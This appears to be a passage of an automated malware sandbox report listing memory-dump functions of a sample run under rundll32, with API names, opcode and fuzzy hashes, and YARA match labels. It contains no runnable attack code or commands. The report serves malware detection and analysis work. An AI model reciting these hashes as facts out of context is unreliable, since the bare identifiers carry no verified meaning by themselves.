                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 16cf824ec7d0510776d9abf9b55909e4b82964d1d556a586e084d55bf8765526
                                                                  • Instruction ID: 1df2086716eb2bd1506f7fedf8301707282539f4fc20aa627086f59e21b839be
                                                                  • Opcode Fuzzy Hash: 16cf824ec7d0510776d9abf9b55909e4b82964d1d556a586e084d55bf8765526
                                                                  • Instruction Fuzzy Hash: 3F41D3B590431DAFDB11CF69DC88AEABBB9EF49200F2442D9E409D3240EA349E848F50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0
                                                                  • API String ID: 0-4108050209
                                                                  • Opcode ID: b3f44ecc94162bf1cb633096b507e802e06815ec993419d3b40d8d2adf52edf5
                                                                  • Instruction ID: 9365acfe3fe67e341f1723400c8dc74a27061f920c9b960b812db4196bc260a3
                                                                  • Opcode Fuzzy Hash: b3f44ecc94162bf1cb633096b507e802e06815ec993419d3b40d8d2adf52edf5
                                                                  • Instruction Fuzzy Hash: 63E1AB746007058FCB95CF68E680ABAB7F2FF49310B90665DD597DB690E330B942EB21
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8jLTyTTW[YL]p]YH
                                                                  • API String ID: 0-613104928
                                                                  • Opcode ID: 580497cab92990d39e97eada57138bcd39ffc78c8f3bd34b3b4195888a899f16
                                                                  • Instruction ID: 590c26b19c2a2b02d690014c3bb66fa4c68c10e4ea0ddc3c2461ec0c786063b7
                                                                  • Opcode Fuzzy Hash: 580497cab92990d39e97eada57138bcd39ffc78c8f3bd34b3b4195888a899f16
                                                                  • Instruction Fuzzy Hash: BD12AD74E05269CFDB25CFA8C890BDDBBB2BF49304F10819AD859AB345D734AA85CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0
                                                                  • API String ID: 0-4108050209
                                                                  • Opcode ID: 325d3397d0af235ef7d486842ae8ab836a74711f1c6b620a8e9d878cf7af6946
                                                                  • Instruction ID: 01690fa87923b5189d568459b499ccd8ad65b4543706dd6d8744a01db3c465a7
                                                                  • Opcode Fuzzy Hash: 325d3397d0af235ef7d486842ae8ab836a74711f1c6b620a8e9d878cf7af6946
                                                                  • Instruction Fuzzy Hash: 1FC1DF74A007068FDB96CF64E6806BEB7B6FB4D204F90665DD4939B290E730F941EB81
                                                                  APIs
                                                                    • Part of subcall function 7FB51EEC: GetLastError.KERNEL32(?,00000008,7FB5699C), ref: 7FB51EF0
                                                                    • Part of subcall function 7FB51EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7FB51F92
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7FB5A9A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 3736152602-0
                                                                  • Opcode ID: 3e0b25268e8581b29c9943cc34adb8d1c4ef7e7bd8c12cf771d6b3af7df81dea
                                                                  • Instruction ID: 4bf8e26431b5a607f7d0f0f7e28ee19dcf7163397bca4befb644af236d1028d7
                                                                  • Opcode Fuzzy Hash: 3e0b25268e8581b29c9943cc34adb8d1c4ef7e7bd8c12cf771d6b3af7df81dea
                                                                  • Instruction Fuzzy Hash: 5821D776610356ABDB19CE65ED41EAA77BCEF44310B10417AED02EB140EB38E941CB50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0
                                                                  • API String ID: 0-4108050209
                                                                  • Opcode ID: 6280a8ca63818c3acd6faf594ee97cac9c1a3ca06ae0039f5c28da5e2b90fa25
                                                                  • Instruction ID: 5839711afd201eeb39abc7cbe4e8934aa7993c51c14ce50f59a0236b4f2cd458
                                                                  • Opcode Fuzzy Hash: 6280a8ca63818c3acd6faf594ee97cac9c1a3ca06ae0039f5c28da5e2b90fa25
                                                                  • Instruction Fuzzy Hash: 67B1E674E007098BDB95CFA4EB80ABEB7F5EF48200F90691DD45B97290EB30B945EB51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0
                                                                  • API String ID: 0-4108050209
                                                                  • Opcode ID: 998781f93cb950c72593837baa1b3bd223baecfbe1b243f5452c1b4668c14c7b
                                                                  • Instruction ID: a99e1e847bb220494f5ab744782eab3a8968432499921f04638462c4d3c91f94
                                                                  • Opcode Fuzzy Hash: 998781f93cb950c72593837baa1b3bd223baecfbe1b243f5452c1b4668c14c7b
                                                                  • Instruction Fuzzy Hash: EBB114B090070A9BDB51CF64E7A06FEB7B5EF08600F90661AD85397390E735F906EB51
                                                                  APIs
                                                                    • Part of subcall function 7FB51EEC: GetLastError.KERNEL32(?,00000008,7FB5699C), ref: 7FB51EF0
                                                                    • Part of subcall function 7FB51EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7FB51F92
                                                                  • EnumSystemLocalesW.KERNEL32(7FB5A700,00000001,00000000,?,-00000050,?,7FB5AD31,00000000,?,?,?,00000055,?), ref: 7FB5A64C
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                  • String ID:
                                                                  • API String ID: 2417226690-0
                                                                  • Opcode ID: da7279e1c2d3f904f9e5a740b28919a58d3cdf8898544bfa76cd2b6f35db47dc
                                                                  • Instruction ID: 377951e6ee41af7cac30496d3e275ace266b5af37b6446a43b3e64784ac66859
                                                                  • Opcode Fuzzy Hash: da7279e1c2d3f904f9e5a740b28919a58d3cdf8898544bfa76cd2b6f35db47dc
                                                                  • Instruction Fuzzy Hash: 12114C3B2003015FD7189F39D89057ABBA6FF84768B19442CD9875BA40E7797843CB40
                                                                  APIs
                                                                    • Part of subcall function 7FB51EEC: GetLastError.KERNEL32(?,00000008,7FB5699C), ref: 7FB51EF0
                                                                    • Part of subcall function 7FB51EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7FB51F92
                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,7FB5A91C,00000000,00000000,?), ref: 7FB5ABAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 3736152602-0
                                                                  • Opcode ID: cb50c1682850077c831604e1cbefe807e35271ad3c0f0e683e8290cf16d4d1d6
                                                                  • Instruction ID: b0f460e4945e86bfefd96fd2fc91bda32f7c09e4c9f8cc616fa3f7b8c356be13
                                                                  • Opcode Fuzzy Hash: cb50c1682850077c831604e1cbefe807e35271ad3c0f0e683e8290cf16d4d1d6
                                                                  • Instruction Fuzzy Hash: 95F0F43A604312AFEB148A21AC05BFA777DEB44764F110529DC03B7180EA78FE01C6D0
                                                                  APIs
                                                                    • Part of subcall function 7FB51EEC: GetLastError.KERNEL32(?,00000008,7FB5699C), ref: 7FB51EF0
                                                                    • Part of subcall function 7FB51EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7FB51F92
                                                                  • EnumSystemLocalesW.KERNEL32(7FB5A953,00000001,00000001,?,-00000050,?,7FB5ACF5,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 7FB5A6BF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                  • String ID:
                                                                  • API String ID: 2417226690-0
                                                                  • Opcode ID: 8450ef9a11f452f0add689ceba0ea8e063f18d6f094a5c8bfd6b7347a81fe4c7
                                                                  • Instruction ID: e492cf9f69922a2598152dadaee40636b716ba694332d2214d8f5955cac44069
                                                                  • Opcode Fuzzy Hash: 8450ef9a11f452f0add689ceba0ea8e063f18d6f094a5c8bfd6b7347a81fe4c7
                                                                  • Instruction Fuzzy Hash: 40F046362003051FD7149F35EC84A6A7BA9EF80768B16442CEA469F680E679AC42C700
                                                                  APIs
                                                                    • Part of subcall function 7FB4F430: EnterCriticalSection.KERNEL32(-7FE45678,?,7FB50E1E,?,7FB76558,0000000C,7FB51108,7FB652A0), ref: 7FB4F43F
                                                                  • EnumSystemLocalesW.KERNEL32(7FB53E22,00000001,7FB76698,0000000C,7FB542AA,00000000), ref: 7FB53E67
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                  • String ID:
                                                                  • API String ID: 1272433827-0
                                                                  • Opcode ID: 635f148f26d6cdea09e2348f7e92d62b087157870cdd478b5a0c7b7206d9166b
                                                                  • Instruction ID: 8d522defa2b49e6d10ee2308a1df483a31a4458236a01785e553a5c6994ebd8b
                                                                  • Opcode Fuzzy Hash: 635f148f26d6cdea09e2348f7e92d62b087157870cdd478b5a0c7b7206d9166b
                                                                  • Instruction Fuzzy Hash: 95F014BAA01310AFD710DFA9E441BAD77E1EB48731F20421AE9219B2A0CB7999159F50
                                                                  APIs
                                                                    • Part of subcall function 7FB51EEC: GetLastError.KERNEL32(?,00000008,7FB5699C), ref: 7FB51EF0
                                                                    • Part of subcall function 7FB51EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7FB51F92
                                                                  • EnumSystemLocalesW.KERNEL32(7FB5A4E8,00000001,00000001,?,?,7FB5AD53,-00000050,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7FB5A5C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                  • String ID:
                                                                  • API String ID: 2417226690-0
                                                                  • Opcode ID: 7ff9f1625fd1d1e8ca5d1bd3dc479b99713ad14ac814fff06fcf7c856ff705bb
                                                                  • Instruction ID: a62ea9830bcb47b72c13edd44b77fd28be3423b11edbcbddeecaebac4e6724f2
                                                                  • Opcode Fuzzy Hash: 7ff9f1625fd1d1e8ca5d1bd3dc479b99713ad14ac814fff06fcf7c856ff705bb
                                                                  • Instruction Fuzzy Hash: FBF0553A30030457CB049F36E804B6A7FA8EFC2320B0A4059EA069F640D639A983C750
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,7FB53498,?,20001004,00000000,00000002,?,?,7FB52A9A), ref: 7FB543E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 46422df55021a920939bebe5928bb53f27b2fcfedb81777b9f69e638f7ab3dc0
                                                                  • Instruction ID: e884635d35ebd67a589caea6fdd03dd44fb892edecb5c8214d8a11bdac0e3a74
                                                                  • Opcode Fuzzy Hash: 46422df55021a920939bebe5928bb53f27b2fcfedb81777b9f69e638f7ab3dc0
                                                                  • Instruction Fuzzy Hash: 96E04F3A544318FBCF122F62EC05AAE3E2AEF44761F254421FD056B260CB758931AAD0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __aullrem
                                                                  • String ID: N/A
                                                                  • API String ID: 3758378126-2525114547
                                                                  • Opcode ID: b3e5048d59ddd93a4e3fdb701d87d6bfa23013a5cbbcba734350dc48db829aa3
                                                                  • Instruction ID: 7850fd71d1a7b59c3f34c2e1174c1529d53f5610a4a4a234ac32d6afd108d590
                                                                  • Opcode Fuzzy Hash: b3e5048d59ddd93a4e3fdb701d87d6bfa23013a5cbbcba734350dc48db829aa3
                                                                  • Instruction Fuzzy Hash: 4CB1BFB4E042589FCB14CF98D990AEEBBB1BF88304F248199D859AB345D735AA85CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __aullrem
                                                                  • String ID: N/A
                                                                  • API String ID: 3758378126-2525114547
                                                                  • Opcode ID: 0febd79041bd55a6414411d95f4d8fa6dced6f7a23f9cd194c2e79a2637feefc
                                                                  • Instruction ID: 3e95937a4185a66e9bcae040238e92d5ca7b759ab746e906564fbc2a40934904
                                                                  • Opcode Fuzzy Hash: 0febd79041bd55a6414411d95f4d8fa6dced6f7a23f9cd194c2e79a2637feefc
                                                                  • Instruction Fuzzy Hash: 8AB1D0B4E042189FCB14CFA9D990AEDFBF2BF88304F248199D859AB345D730AA45CF51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: e
                                                                  • API String ID: 0-4024072794
                                                                  • Opcode ID: 02352f8507a17d444bbdf42c5d579d86689da7911503822574f87064fd18f9e1
                                                                  • Instruction ID: 7d56df432eca3792d11e9d939b6af90c0c4791a39bc1248fbc3c2beb6584e0d5
                                                                  • Opcode Fuzzy Hash: 02352f8507a17d444bbdf42c5d579d86689da7911503822574f87064fd18f9e1
                                                                  • Instruction Fuzzy Hash: B2C17DB8E052698FCB64CF58C990BDDBBB1BF89304F1481DAD949A7346D730AA81CF54
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N/A
                                                                  • API String ID: 0-2525114547
                                                                  • Opcode ID: 0875045976aed0a53db4a90548830d3aacb4560f22edc233d78b1d3f77a8f2ba
                                                                  • Instruction ID: 53fdaf35f49ac52a144b786074c60058b8559797b5593522a98f67baf530331f
                                                                  • Opcode Fuzzy Hash: 0875045976aed0a53db4a90548830d3aacb4560f22edc233d78b1d3f77a8f2ba
                                                                  • Instruction Fuzzy Hash: 09A1CEB4E042589FDB14CF98D890ADDFBF2BF89304F24819AD859AB305D730AA45CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N/A
                                                                  • API String ID: 0-2525114547
                                                                  • Opcode ID: 238d0c5aa66f31de88770e04399f5c0c97293cd383dfbb58ff5fc948b3f00bf0
                                                                  • Instruction ID: fda9131b2ca7fc452004ea507259c99537b0b2bf70a208ab8f11dd36afd7a46b
                                                                  • Opcode Fuzzy Hash: 238d0c5aa66f31de88770e04399f5c0c97293cd383dfbb58ff5fc948b3f00bf0
                                                                  • Instruction Fuzzy Hash: E2A1AD78E042589FDB14CFA9D990ADDFBF2BF88304F24819AD859AB345D730AA45CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: edaa1447cf3235624d7b53505e49af9f0030d26a5f90098b5fd0aef4abffaeb1
                                                                  • Instruction ID: 11d535c5fff05c55defc5c443e713651f9efc0b96ddb41e8c79920fe19a94046
                                                                  • Opcode Fuzzy Hash: edaa1447cf3235624d7b53505e49af9f0030d26a5f90098b5fd0aef4abffaeb1
                                                                  • Instruction Fuzzy Hash: BBA26A78E05269CFDB65CF68D990BDDBBB1BB49304F1082DAD849A7345D730AA81CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c020e87c38c58edd57ff95e5dea8cb4e0bf70ec40c866c064afaf11bb8357492
                                                                  • Instruction ID: 4447c2849dce27a9172a6d84226298ec6eedd0bc97ac291b03183f282acc7fa7
                                                                  • Opcode Fuzzy Hash: c020e87c38c58edd57ff95e5dea8cb4e0bf70ec40c866c064afaf11bb8357492
                                                                  • Instruction Fuzzy Hash: 19125C78E05269CFDB64CF58C994B9DBBB2BF89304F2081D9D849AB355D730AA81CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                  • String ID:
                                                                  • API String ID: 3471368781-0
                                                                  • Opcode ID: 864d3239cb0ff9994ab781145b62885edba9d628b16c5d0630b339c577032b1a
                                                                  • Instruction ID: 6df8e9715cef3378fbe9339ba926a29ef444549a4c0987ad0364fc83f9aae481
                                                                  • Opcode Fuzzy Hash: 864d3239cb0ff9994ab781145b62885edba9d628b16c5d0630b339c577032b1a
                                                                  • Instruction Fuzzy Hash: 6EB114756007068BDB299F35DC92AA7B3B9EF44308F14452DE983DB580FA79F989CB10
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: add8a23739b7b53e24ebff533506f9a7d62a377ad97ca8564ca037c9842dbe05
                                                                  • Instruction ID: ce370f7397a55b83678db3b5d1378ad84f051976dafc0b97ad5eb4ca2bdd0a97
                                                                  • Opcode Fuzzy Hash: add8a23739b7b53e24ebff533506f9a7d62a377ad97ca8564ca037c9842dbe05
                                                                  • Instruction Fuzzy Hash: E6D1D978E00209DFCB05CF69D491A9DBBB6FF89314F64C299E816AB355D731A981CF80
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6f3193ded926ed4420defb500cfa97874007a13f02a14ad6cbc4be5a94fad96a
                                                                  • Instruction ID: 8124a1ee4f7f6de4fd26caaa72038b06745b62493a9255e172874b7c0d01faa0
                                                                  • Opcode Fuzzy Hash: 6f3193ded926ed4420defb500cfa97874007a13f02a14ad6cbc4be5a94fad96a
                                                                  • Instruction Fuzzy Hash: DED16A78E05268CFCB64CF58D990BDDBBB1BF89304F1482DAD849A7355DA30AA85CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 02af781d49429959001784ae0d5e7644f8777fefcc2581ed0a48a717ec8facfe
                                                                  • Instruction ID: e263335bb7e3d1c418aacd955e06d0b0ce010cd89a10fc41c09daa6745e21faf
                                                                  • Opcode Fuzzy Hash: 02af781d49429959001784ae0d5e7644f8777fefcc2581ed0a48a717ec8facfe
                                                                  • Instruction Fuzzy Hash: B8B1D3B4D04259DFDB14CFA8D890BDDBBB1BF49310F108299D859AB385DB30AA85CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aada38a356ba611c731ba3ed1809a301d30241e3955f06deed100ce48d465c97
                                                                  • Instruction ID: 280aab17326b2627fefa5ad832f3c292f72d420acb44d71593bb8f4e43a15edd
                                                                  • Opcode Fuzzy Hash: aada38a356ba611c731ba3ed1809a301d30241e3955f06deed100ce48d465c97
                                                                  • Instruction Fuzzy Hash: DAB1D2B4D04259DFDB14CFA8D890BEDBBB1BF48314F108299D819AB385DB34AA85CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5668fcbe2f5b655b5f06d0fd35fc9b3772ed2713ea083cf7429261622c69dc39
                                                                  • Instruction ID: 8d3716ec65e3a3f0ce6d22e6a5968f2e76a93b66ded8a63324e45222b1ae8f7e
                                                                  • Opcode Fuzzy Hash: 5668fcbe2f5b655b5f06d0fd35fc9b3772ed2713ea083cf7429261622c69dc39
                                                                  • Instruction Fuzzy Hash: DFB1CFB8D04259DFDB14CFA8D890BEDBBB1BF48304F108299D859AB385D7346A85CF91
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
                                                                  • Instruction ID: 336cd761ff79b3a7bfc4c06f32e98682c6003091aca3ac9986fe9727b1685342
                                                                  • Opcode Fuzzy Hash: 2d59a319cfa946ca7337b894a61833da0227367b0d0c7e8111fbdef103237116
                                                                  • Instruction Fuzzy Hash: 13B17F78E10219DBCB14DF99D590AADFBB2FF48304F20819AE859AB355D730AA81CF54
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 545aceb15d6fecf2842a96bba772485ba6e3f7a633a1b1ecef92cfc776621247
                                                                  • Instruction ID: 7e758ee889fafa6f12d03acff54044b097dfb09cc2eb66d5b955253ff5b435d0
                                                                  • Opcode Fuzzy Hash: 545aceb15d6fecf2842a96bba772485ba6e3f7a633a1b1ecef92cfc776621247
                                                                  • Instruction Fuzzy Hash: F6917DB8E052199FDB08CF99D490AEDFBB2FF48304F248199D815AB345D734A946CF94
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7894568d44e382275c7355847ad892dfa58d296d52f6d85062c2a1476f1e2588
                                                                  • Instruction ID: 42041631dbab2eccd8ba70a9152bdea45013c95a8624f479f1d8e31e5af98afc
                                                                  • Opcode Fuzzy Hash: 7894568d44e382275c7355847ad892dfa58d296d52f6d85062c2a1476f1e2588
                                                                  • Instruction Fuzzy Hash: 96818DB8E052499FCB05CFA8D490AEEFBB2FF48304F248199D815AB345D735A946CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6a4520f36a809a18397db0f2ab063229439142230a76a1cf20750397584d6650
                                                                  • Instruction ID: ca94ff371e72ae6f80a955859fd1165bf4d2831999b09692882f206eb9bb3398
